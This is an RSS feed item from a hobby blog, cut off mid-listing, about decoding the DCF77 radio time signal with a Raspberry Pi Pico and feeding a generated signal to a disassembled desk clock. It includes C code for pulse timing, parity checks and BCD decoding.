<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="/static/feed.xsl?v=630b5fee" type="text/xsl"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
    <channel>
        <title>deadlime</title>
        <description>Web, programming, dead citrus fruits.</description>
        <lastBuildDate>Sat, 17 Feb 2024 12:17:15 +0000</lastBuildDate>
        <language>en</language>
        <link>https://deadlime.hu/en/</link>
        
            <item>
            <title>Something&#039;s in the air</title>
            <link>https://deadlime.hu/en/2024/01/26/somethings-in-the-air/</link>
            <pubDate>Fri, 26 Jan 2024 11:47:15 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">8c0cb3b5b8c14e0a5e1492082c2360fb</guid>
            <description>Atomic clocks, radio signals, and time synchronization</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/desk_clock.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>The <a href="https://deadlime.hu/en/2023/12/28/the-time-has-not-yet-come/">previous clock-building project</a> made me think that there must be a simpler way. So I just bought a desk clock.</p>
<p>Well, that's not exactly how it happened. I just happen to have more than one time-related project going at once. This little project, for example, is about how people had access to accurate time before the Internet.</p>
<p>Of course, they looked out of the window and read the time off the church tower. Thanks to modern technology, we can do this relatively easily: we just point a camera at the church tower and use artificial intelligence to read the time from the position of the clock hands.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/tower.jpg" width="400" height="600" alt="" title="" loading="lazy" />
</p>

<p>But it's not that simple. Somehow we have to determine whether it is morning or afternoon, and it probably wouldn't hurt to know the date. Not to mention the case when there is no church tower in sight.</p>
<p>Observant readers may have noticed that I wouldn't need a desk clock for this. Well, yes, that wasn't the direction I was going; I didn't want to go <em>that</em> far back in time. Actually, I wondered how radio-controlled clocks work.</p>
<h3>Radio time synchronization</h3>
<p>It all starts with a transmitter tower. From my area, I can pick up the signal sent out by a German tower called DCF77, but there are <a href="https://en.wikipedia.org/wiki/Radio_clock#List_of_radio_time_signal_stations">several other ones</a> covering the whole world.</p>
<p>In the case of DCF77, the signal is derived from an atomic clock, and one complete time code takes 60 seconds to transmit: one bit arrives every second, and the sequence is terminated by an extended pause (there is no pulse in the last second of the minute). However, there is quite a lot of noise, so you may not have collected enough bits when the longer pause arrives, or, more likely, noise adds spurious pulses and you end up with more than 59 bits before the pause. Depending on reception conditions, it may take quite a while to synchronize.</p>
<p>All we need is a receiver. This usually consists of a ferrite rod antenna and some electronics. It is possible to <a href="https://www.aliexpress.com/w/wholesale-dcf77-receiver.html">order a receiver from China</a>, but I didn't want to wait a month and then deal with the local postal service, so the quickest solution seemed to be to buy a cheap radio-controlled clock and take it apart.</p>
<h3>The victim</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/clock_insides.jpg" width="660" height="660" alt="" title="" loading="lazy" />
</p>

<p>Looking inside the clock mentioned earlier, you can see a separate printed circuit board at the bottom with a ferrite rod antenna underneath it. I desoldered them both.</p>
<p>The clock survived the surgery: everything works the same, except that it has lost its (radio) hearing.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/emax_6007_v1.jpg" width="660" height="660" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">EMAX 6007 V1<br/>GE16-1055R5<br/>NEW GE13-887</p>

<p>The labels on the radio receiver didn't help me find any documentation, but based on other similar boards I figured out that <code>GND</code> goes to ground, <code>VCC</code> wants 3.3 volts, and <code>PON</code> can turn the whole module on and off (but doesn't need to be wired anywhere). That leaves <code>NTCO</code>, so that must be the data output.</p>
<p>I added some more wires with jumper connectors on the end so I could use it with a breadboard, and then I wired the whole thing to a Pico.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring1.jpg" width="660" height="540" alt="" title="" loading="lazy" />
</p>

<p>It would have been nice to get it right the first time. I spent a couple of hours here trying to find out why no data was coming from the antenna. I searched for documentation on the module, connected <code>PON</code>, tried different GPIO pins on the Pico, and even suspected the code. In the end, I solved it by powering the module from a dedicated power source, with the Pico only receiving the data signal. Probably the Pico could not supply enough power to the module.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring2.jpg" width="660" height="540" alt="" title="" loading="lazy" />
</p>

<h3>Bits in the noise</h3>
<p>Some kind of data seems to be coming in, so let's do something with it. At first, I just flashed the LED on the Pico to get feedback on what was happening.</p>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"pico/stdlib.h"</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DCF_PIN 16</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LED_PIN 25</span>

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">on_change</span><span class="hljs-params">(uint gpio, <span class="hljs-keyword">uint32_t</span> event_mask)</span> </span>{
  gpio_put(LED_PIN, event_mask &amp; GPIO_IRQ_EDGE_RISE);
}

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
  gpio_init(DCF_PIN);
  gpio_init(LED_PIN);

  gpio_set_dir(DCF_PIN, GPIO_IN);
  gpio_set_dir(LED_PIN, GPIO_OUT);

  gpio_set_irq_enabled_with_callback(
    DCF_PIN,
    GPIO_IRQ_EDGE_FALL | GPIO_IRQ_EDGE_RISE,
    <span class="hljs-literal">true</span>,
    &amp;on_change
  );

  <span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
    sleep_ms(<span class="hljs-number">1000</span>);
  }
}
</code></pre>
<p>The next step is to start measuring how long the signal is high and low. According to the documentation, <code>0</code> is received when the signal is high for 100 milliseconds, and <code>1</code> is received when the signal is high for 200 milliseconds. Since there is one bit per second, there should be 800-900 milliseconds of low between two high states. In the last second, no data is coming in, so there is a low state for 1800-1900 milliseconds.</p>
<p>First, we define some constant values for noise filtering, to determine whether we got <code>0</code> or <code>1</code> and to detect the end of the data.</p>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MINIMAL_HIGH_PULSE_WIDTH 50</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MINIMAL_LOW_PULSE_WIDTH 700</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> PULSE_WIDTH_THRESHOLD 150</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> END_OF_DATA_PULSE_WIDTH 1500</span>
</code></pre>
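<p>To make the role of these constants concrete, here is a minimal sketch (not part of the original code; the enum and function names are hypothetical) that classifies a single high pulse or low gap by its duration in milliseconds. <code>PULSE_WIDTH_THRESHOLD</code> sits halfway between the nominal 100 and 200 ms pulses, and <code>END_OF_DATA_PULSE_WIDTH</code> sits between the normal 800-900 ms gap and the 1800-1900 ms gap at the end of the minute, so both leave room for timing jitter.</p>

```c
#include <stdint.h>

/* Same values as the #defines above, in milliseconds. */
#define MINIMAL_HIGH_PULSE_WIDTH 50
#define MINIMAL_LOW_PULSE_WIDTH 700
#define PULSE_WIDTH_THRESHOLD 150
#define END_OF_DATA_PULSE_WIDTH 1500

typedef enum { PULSE_NOISE = -1, PULSE_BIT_0 = 0, PULSE_BIT_1 = 1 } high_pulse_kind;
typedef enum { GAP_NOISE, GAP_NEXT_BIT, GAP_MINUTE_MARK } low_gap_kind;

/* High pulse: ~100 ms encodes 0, ~200 ms encodes 1, under 50 ms is noise. */
high_pulse_kind classify_high(uint32_t high_ms) {
  if (high_ms < MINIMAL_HIGH_PULSE_WIDTH) {
    return PULSE_NOISE;
  }
  return high_ms > PULSE_WIDTH_THRESHOLD ? PULSE_BIT_1 : PULSE_BIT_0;
}

/* Low gap: ~800-900 ms between bits, ~1800-1900 ms where second 59 has no pulse. */
low_gap_kind classify_low(uint32_t low_ms) {
  if (low_ms < MINIMAL_LOW_PULSE_WIDTH) {
    return GAP_NOISE;
  }
  return low_ms > END_OF_DATA_PULSE_WIDTH ? GAP_MINUTE_MARK : GAP_NEXT_BIT;
}
```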
<p>Then we will also need some variables to store the time of previous state changes and the data that has arrived so far.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">uint32_t</span> rise_time = <span class="hljs-number">0</span>;
<span class="hljs-keyword">uint32_t</span> fall_time = <span class="hljs-number">0</span>;

<span class="hljs-keyword">uint64_t</span> <span class="hljs-built_in">buffer</span> = <span class="hljs-number">0</span>;
<span class="hljs-keyword">uint32_t</span> buffer_position = <span class="hljs-number">0</span>;
</code></pre>
<p>After that, we only need to write the inside of <code>on_change</code>. We ask the Pico how many milliseconds have elapsed since it was started.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">uint32_t</span> now = to_ms_since_boot(get_absolute_time());
</code></pre>
<p>Then we do some noise filtering, otherwise it would be almost impossible to get the time.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">if</span> (now - fall_time &lt; MINIMAL_LOW_PULSE_WIDTH) {
  <span class="hljs-keyword">return</span>;
}

<span class="hljs-keyword">if</span> (now - rise_time &lt; MINIMAL_HIGH_PULSE_WIDTH) {
  <span class="hljs-keyword">return</span>;
}
</code></pre>
<p>If the signal has gone from low to high, we check whether the low signal was long enough to indicate the end of the data. If at that point we have exactly 59 bits, all is OK; if not, we start over.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">if</span> (event_mask &amp; GPIO_IRQ_EDGE_RISE) {
  rise_time = now;

  <span class="hljs-keyword">if</span> (rise_time - fall_time &gt; END_OF_DATA_PULSE_WIDTH) {
    <span class="hljs-keyword">if</span> (buffer_position == <span class="hljs-number">59</span>) {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">" - data received: %llu\n"</span>, <span class="hljs-built_in">buffer</span>);
    }
    <span class="hljs-keyword">else</span> {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">" - reset: not enough data\n"</span>);
    }
    <span class="hljs-built_in">buffer</span> = buffer_position = <span class="hljs-number">0</span>;
  }
}
</code></pre>
<p>If the signal went from high to low, we decide whether we got a <code>0</code> or a <code>1</code> based on the length of the high signal and store the result in the buffer. Due to noise, we may end up with more bits than a frame can hold; if so, we start over.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (event_mask &amp; GPIO_IRQ_EDGE_FALL) {
  fall_time = now;

  <span class="hljs-keyword">uint64_t</span> next_bit = fall_time - rise_time &gt; PULSE_WIDTH_THRESHOLD ? <span class="hljs-number">1</span> : <span class="hljs-number">0</span>;

  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%llu"</span>, next_bit);

  <span class="hljs-built_in">buffer</span> |= next_bit &lt;&lt; buffer_position;
  ++buffer_position;

  <span class="hljs-keyword">if</span> (buffer_position &gt; <span class="hljs-number">59</span>) {
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">" - reset: too much data\n"</span>);
    <span class="hljs-built_in">buffer</span> = buffer_position = <span class="hljs-number">0</span>;
  }
}
</code></pre>
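<p>Because the callback only depends on timestamps and edge directions, its logic can also be tested on a PC by feeding it synthetic edges. The sketch below is the same logic with the globals moved into a struct and the <code>printf</code> calls replaced by a return value; the names <code>dcf77_decoder</code> and <code>dcf77_on_edge</code> are hypothetical, and it assumes the caller passes a millisecond timestamp like the one <code>to_ms_since_boot</code> returns.</p>

```c
#include <stdbool.h>
#include <stdint.h>

#define MINIMAL_HIGH_PULSE_WIDTH 50
#define MINIMAL_LOW_PULSE_WIDTH 700
#define PULSE_WIDTH_THRESHOLD 150
#define END_OF_DATA_PULSE_WIDTH 1500

/* The globals from the callback, grouped so several decoders can coexist. */
typedef struct {
  uint32_t rise_time;
  uint32_t fall_time;
  uint64_t buffer;
  uint32_t buffer_position;
} dcf77_decoder;

/* Feed one edge (rising = low-to-high) seen at `now` ms. Returns true and
   stores the frame in *frame when exactly 59 bits preceded the long pause. */
bool dcf77_on_edge(dcf77_decoder *d, bool rising, uint32_t now, uint64_t *frame) {
  /* Noise filtering: ignore edges that come too soon after the last ones. */
  if (now - d->fall_time < MINIMAL_LOW_PULSE_WIDTH) return false;
  if (now - d->rise_time < MINIMAL_HIGH_PULSE_WIDTH) return false;

  bool complete = false;
  if (rising) {
    d->rise_time = now;
    if (d->rise_time - d->fall_time > END_OF_DATA_PULSE_WIDTH) {
      if (d->buffer_position == 59) {
        *frame = d->buffer;
        complete = true;
      }
      d->buffer = 0;
      d->buffer_position = 0;
    }
  } else {
    d->fall_time = now;
    uint64_t next_bit = d->fall_time - d->rise_time > PULSE_WIDTH_THRESHOLD ? 1 : 0;
    d->buffer |= next_bit << d->buffer_position;
    if (++d->buffer_position > 59) {  /* too much data: start over */
      d->buffer = 0;
      d->buffer_position = 0;
    }
  }
  return complete;
}
```

<p>Feeding it one rising and one falling edge per second for 59 seconds (100 ms high for a <code>0</code>, 200 ms for a <code>1</code>), followed by the rising edge after the long pause, should return the 59 bits encoded in the pulse widths.</p>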
<p>If all goes well, we will have a series of data at the end, hopefully with the current exact time.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2024/debug_output.webm" type="video/webm" />
</video>
<p class="image-caption">The data is flowing in very slowly...</p>

<h3>Let's be sure</h3>
<p>Noise has been mentioned several times, and it can be a big problem. In the room where I have my desktop and servers, I couldn't extract any usable data at all. I had to move to another room with a laptop so I could test the code. During the day there was a lot of noise and it took me half an hour to get the exact time, but in the evening I got a complete frame almost every minute.</p>
<p>So we have a bunch of bits, but we don't know whether a <code>1</code> we think we received was actually sent as a <code>1</code>. To check this, the data contains three parity bits, each of which is <code>0</code> if the bits it covers contain an even number of <code>1</code>s and <code>1</code> if that number is odd. First, let's look at how to calculate the parity of an arbitrary int:</p>
<pre><code class="hljs arduino"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">parity</span><span class="hljs-params">(<span class="hljs-keyword">int</span> num)</span> </span>{
  num ^= num &gt;&gt; <span class="hljs-number">16</span>;
  num ^= num &gt;&gt; <span class="hljs-number">8</span>;
  num ^= num &gt;&gt; <span class="hljs-number">4</span>;
  num ^= num &gt;&gt; <span class="hljs-number">2</span>;
  num ^= num &gt;&gt; <span class="hljs-number">1</span>;
  <span class="hljs-keyword">return</span> num &amp; <span class="hljs-number">1</span>;
}
</code></pre>
<p>I won't go into the details, the <a href="https://stackoverflow.com/a/21618038">Stack Overflow page</a> I stole the code from has a great explanation. Also, we need to know which ones are the parity bits and what data they are calculated on. We can look this up on the <a href="https://en.wikipedia.org/wiki/DCF77#Time_code_interpretation">related Wikipedia page</a>. For example, for minutes:</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> min_data = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">21</span>) &amp; <span class="hljs-number">0b1111111</span>);
<span class="hljs-keyword">int</span> min_parity = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">28</span>) &amp; <span class="hljs-number">1</span>);

<span class="hljs-keyword">if</span> (parity(min_data) != min_parity) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid parity for minute\n"</span>);
}
</code></pre>
<p>We shift the <code>buffer</code> right by 21 bits (effectively discarding the first 21 bits), because the minute data starts at bit 21 (counting from 0, as in the Wikipedia table), and we keep the lowest 7 bits (<code>&amp; 0b1111111</code>), because that's how long the minute data is.</p>
<p>For parity, the first 28 bits are discarded and only 1 bit of the remaining data is retained. The parity we calculate should match the parity we got.</p>
<p>The hour and date are checked similarly; only the number of right shifts and the number of bits kept afterward vary.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> hour_data = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">29</span>) &amp; <span class="hljs-number">0b111111</span>);
<span class="hljs-keyword">int</span> hour_parity = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">35</span>) &amp; <span class="hljs-number">1</span>);

<span class="hljs-keyword">if</span> (parity(hour_data) != hour_parity) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid parity for hour\n"</span>);
}

<span class="hljs-keyword">int</span> date_data = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">36</span>) &amp; <span class="hljs-number">0b1111111111111111111111</span>);
<span class="hljs-keyword">int</span> date_parity = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">58</span>) &amp; <span class="hljs-number">1</span>);

<span class="hljs-keyword">if</span> (parity(date_data) != date_parity) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid parity for date\n"</span>);
}
</code></pre>
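<p>Since even parity means that the covered bits plus their parity bit must contain an even number of <code>1</code>s, each check can also be done in one step over the data and parity bits together. Here is a minimal sketch combining the three parity checks with the two fixed marker bits from the Wikipedia table (bit 0 is always <code>0</code>, bit 20 is always <code>1</code>); the helper names are hypothetical, and it uses a plain bit loop instead of the XOR folding above so that it works on 64-bit values.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* 1 if v contains an odd number of 1 bits, 0 otherwise. */
static int parity64(uint64_t v) {
  int p = 0;
  while (v) {
    p ^= (int)(v & 1);
    v >>= 1;
  }
  return p;
}

/* `len` bits of the frame starting at bit `start` (bit i = second i). */
static uint64_t frame_bits(uint64_t frame, int start, int len) {
  return (frame >> start) & ((1ULL << len) - 1);
}

/* Hypothetical helper: true if the marker bits and all three parities check out. */
bool dcf77_frame_valid(uint64_t frame) {
  if (frame_bits(frame, 0, 1) != 0) return false;   /* start of minute: always 0 */
  if (frame_bits(frame, 20, 1) != 1) return false;  /* start of time: always 1 */
  /* Data bits plus their parity bit must hold an even number of 1s. */
  if (parity64(frame_bits(frame, 21, 8)) != 0) return false;   /* minute 21-27, parity 28 */
  if (parity64(frame_bits(frame, 29, 7)) != 0) return false;   /* hour 29-34, parity 35 */
  if (parity64(frame_bits(frame, 36, 23)) != 0) return false;  /* date 36-57, parity 58 */
  return true;
}
```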
<h3>It's time</h3>
<p>Once the buffer has passed the checks, all we need to do is extract the data and set the exact time on the Pico. First, let's look at the minutes here too.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> <span class="hljs-built_in">min</span> = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">21</span>) &amp; <span class="hljs-number">0b1111111</span>);
<span class="hljs-built_in">min</span> = (<span class="hljs-built_in">min</span> &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (<span class="hljs-built_in">min</span> &amp; <span class="hljs-number">0b1111</span>);
</code></pre>
<p>Extracting the data works the same way as for the parity check, but since the data is encoded as <a href="https://en.wikipedia.org/wiki/Binary-coded_decimal">binary-coded decimal</a>, there is a little extra work to do: the lowest four bits hold the ones digit, and the bits above them (only three in this case) hold the tens digit.</p>
<p>The rest of the data can be obtained similarly. For the day of the week (<code>dow</code>), Sunday arrives as <code>7</code>, but the Pico expects it as <code>0</code>. Also, for the year we have to add <code>2000</code>, because we only get the last two digits.</p>
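<p>The <code>(x &gt;&gt; 4) * 10 + (x &amp; 0b1111)</code> expression handles exactly two digits. As an illustration, a generic loop over 4-bit nibbles does the same for any number of digits; the name <code>bcd_to_int</code> is hypothetical. For example, the minute bits <code>0100011</code> (<code>0x23</code>) decode to 23.</p>

```c
#include <stdint.h>

/* Decode packed BCD: each 4-bit nibble is one decimal digit,
   with the ones digit in the lowest nibble. */
int bcd_to_int(uint32_t bcd) {
  int result = 0;
  int scale = 1;
  while (bcd) {
    result += (int)(bcd & 0xF) * scale;
    scale *= 10;
    bcd >>= 4;
  }
  return result;
}
```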
<pre><code class="hljs arduino"><span class="hljs-keyword">int</span> hour = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">29</span>) &amp; <span class="hljs-number">0b111111</span>);
hour = (hour &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (hour &amp; <span class="hljs-number">0b1111</span>);

<span class="hljs-keyword">int</span> dom = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">36</span>) &amp; <span class="hljs-number">0b111111</span>);
dom = (dom &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (dom &amp; <span class="hljs-number">0b1111</span>);

<span class="hljs-keyword">int</span> dow = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">42</span>) &amp; <span class="hljs-number">0b111</span>);
<span class="hljs-keyword">if</span> (dow == <span class="hljs-number">7</span>) {
  dow = <span class="hljs-number">0</span>;
}

<span class="hljs-keyword">int</span> month = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">45</span>) &amp; <span class="hljs-number">0b11111</span>);
month = (month &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (month &amp; <span class="hljs-number">0b1111</span>);

<span class="hljs-keyword">int</span> year = (<span class="hljs-keyword">int</span>) ((<span class="hljs-built_in">buffer</span> &gt;&gt; <span class="hljs-number">50</span>) &amp; <span class="hljs-number">0b11111111</span>);
year = <span class="hljs-number">2000</span> + (year &gt;&gt; <span class="hljs-number">4</span>) * <span class="hljs-number">10</span> + (year &amp; <span class="hljs-number">0b1111</span>);
</code></pre>
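<p>Each field has a single even parity bit, so two flipped bits in the same field go unnoticed, and a corrupted month can still decode to something like 13. A cheap extra guard, sketched below under the assumption that it runs on the raw <code>buffer</code> before the BCD conversion, checks that every BCD digit is 0 to 9 and each field is in range. The function names are hypothetical; since valid packed BCD sorts like the decimal number it encodes, the ranges can be compared directly in BCD form.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* True if every 4-bit nibble of v is a decimal digit (0-9). */
static bool bcd_valid(uint32_t v) {
  for (; v; v >>= 4) {
    if ((v & 0xF) > 9) return false;
  }
  return true;
}

/* Hypothetical check on the raw frame; dow is still 1 (Monday) to 7 (Sunday). */
bool dcf77_fields_plausible(uint64_t buffer) {
  uint32_t min   = (uint32_t)((buffer >> 21) & 0x7F);
  uint32_t hour  = (uint32_t)((buffer >> 29) & 0x3F);
  uint32_t dom   = (uint32_t)((buffer >> 36) & 0x3F);
  uint32_t dow   = (uint32_t)((buffer >> 42) & 0x7);
  uint32_t month = (uint32_t)((buffer >> 45) & 0x1F);
  uint32_t year  = (uint32_t)((buffer >> 50) & 0xFF);

  if (!bcd_valid(min) || !bcd_valid(hour) || !bcd_valid(dom) ||
      !bcd_valid(month) || !bcd_valid(year)) {
    return false;
  }
  /* Ranges in BCD form, e.g. 0x59 means 59. */
  return min <= 0x59 && hour <= 0x23
      && dom >= 0x01 && dom <= 0x31
      && dow >= 1 && dow <= 7
      && month >= 0x01 && month <= 0x12;
}
```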
<p>Now we just have to tell the Pico RTC module what the exact time is.</p>
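<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"hardware/rtc.h"</span></span>

rtc_init();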

<span class="hljs-keyword">datetime_t</span> t = {
  .year = (<span class="hljs-keyword">int16_t</span>) year,
  .month = (<span class="hljs-keyword">int8_t</span>) month,
  .day = (<span class="hljs-keyword">int8_t</span>) dom,
  .hour = (<span class="hljs-keyword">int8_t</span>) hour,
  .<span class="hljs-built_in">min</span> = (<span class="hljs-keyword">int8_t</span>) <span class="hljs-built_in">min</span>,
  .sec = <span class="hljs-number">0</span>,
  .dotw = (<span class="hljs-keyword">int8_t</span>) dow,
};

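<span class="hljs-keyword">if</span> (!rtc_set_datetime(&amp;t)) {
  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"invalid datetime\n"</span>);
}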
</code></pre>
<p>And that's it, we've got the exact time without the Internet.</p>
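<p>One caveat: DCF77 transmits German local time, and the frame says which offset applies. Per the Wikipedia table linked above, bit 17 is set while CEST (UTC+2) is in effect and bit 18 while CET (UTC+1) is in effect. A minimal sketch for reading that flag, with a hypothetical function name, in case the Pico should keep UTC instead:</p>

```c
#include <stdint.h>

/* Offset of the transmitted time from UTC in hours: 2 for CEST (bit 17),
   1 for CET (bit 18), -1 if the flags are inconsistent. */
int dcf77_utc_offset_hours(uint64_t buffer) {
  int cest = (int)((buffer >> 17) & 1);
  int cet = (int)((buffer >> 18) & 1);
  if (cest && !cet) return 2;
  if (cet && !cest) return 1;
  return -1;
}
```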
<h3>The other direction</h3>
<p>We are left with one poor, unfortunate clock that now can't synchronize itself because we've taken the radio module away. Then my dear colleague <a href="https://github.com/potato">potato</a> came up with the idea of giving it a fake signal, so I found myself once again unscrewing the clock and soldering some jumper cables in place of the old module. At first just for the <code>GND</code> and <code>NTCO</code>, but later I wired in the <code>PON</code> as well.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring3.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>I connected it to the Pico and started sending it a signal, but the clock didn't like it much.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2024/error.mp4" type="video/mp4" />
</video>

<p>At first, I suspected that it was the lack of the <code>PON</code> connection that was causing the problem, that the clock was getting a signal when it wasn't expecting it, so I plugged that in, but the flashing didn't get any better. Then I suspected the soldering, that I might have accidentally shorted something, but after a few minutes of examining it with a magnifying glass, everything looked fine.</p>
<p>Finally, I became suspicious that the Pico was putting out 3.3 volts and the clock was only running on 3 volts, so maybe 3.3 volts was too much for it. I pulled some resistors from a box, but couldn't find one that solved the problem by itself. After connecting one resistor the situation improved, after two it seemed to be fixed, so I finally connected three just in case.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2024/wiring4.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Now we just need a little bit of code. I tried replaying previously recorded real data, repeating it every minute, but the clock didn't care. I found a few bugs where I sent out the wrong data, but even after fixing them it still didn't work. I tweaked the timing a bit to see if the way I sent it was too accurate or something, but no. In the end, it turned out that the clock wanted to be sure and one data series wasn't enough for it: it needs two successful data series in a row before it sets its time.</p>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"pico/stdlib.h"</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DCF_SIGNAL_PIN 12</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DCF_ENABLED_PIN 13</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LED_PIN 25</span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
  stdio_init_all();

  gpio_init(DCF_SIGNAL_PIN);
  gpio_init(DCF_ENABLED_PIN);
  gpio_init(LED_PIN);

  gpio_set_dir(DCF_SIGNAL_PIN, GPIO_OUT);
  gpio_set_dir(DCF_ENABLED_PIN, GPIO_IN);
  gpio_set_dir(LED_PIN, GPIO_OUT);

  <span class="hljs-keyword">uint64_t</span> buffers[] = {
    <span class="hljs-comment">//-----PYYYYYYYYMMMMMWWWDDDDDDPHHHHHHPmmmmmmm1AZZARxxxxxxxxxxxxxx0</span>
    <span class="hljs-number">0b0000000010010000001111100001001011100000000101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011110000001101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011110000010101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011100000011101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011110000100101000010100001000100</span>,
    <span class="hljs-number">0b0000000010010000001111100001001011100000101101000010100001000100</span>,
  };
  <span class="hljs-keyword">int</span> buffer_idx = <span class="hljs-number">0</span>;

  <span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
    <span class="hljs-keyword">if</span> (gpio_get(DCF_ENABLED_PIN)) {
      <span class="hljs-built_in">printf</span>(<span class="hljs-string">"dcf module is not enabled\n"</span>);
      sleep_ms(<span class="hljs-number">5000</span>);
      <span class="hljs-keyword">continue</span>;
    }

    <span class="hljs-keyword">uint64_t</span> b = buffers[buffer_idx];
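    buffer_idx = (buffer_idx + <span class="hljs-number">1</span>) % (<span class="hljs-keyword">int</span>) (<span class="hljs-keyword">sizeof</span>(buffers) / <span class="hljs-keyword">sizeof</span>(buffers[<span class="hljs-number">0</span>])); <span class="hljs-comment">// wrap around instead of reading past the end of the array</span>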

    <span class="hljs-keyword">int</span> length;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">59</span>; ++i) {
      length = b &amp; <span class="hljs-number">1</span> ? <span class="hljs-number">200</span>: <span class="hljs-number">100</span>;
      <span class="hljs-built_in">printf</span>(b &amp; <span class="hljs-number">1</span> ? <span class="hljs-string">"1"</span> : <span class="hljs-string">"0"</span>);

      gpio_put(LED_PIN, <span class="hljs-literal">true</span>);
      gpio_put(DCF_SIGNAL_PIN, <span class="hljs-literal">true</span>);
      sleep_ms(length);

      gpio_put(LED_PIN, <span class="hljs-literal">false</span>);
      gpio_put(DCF_SIGNAL_PIN, <span class="hljs-literal">false</span>);
      sleep_ms(<span class="hljs-number">1000</span> - length);

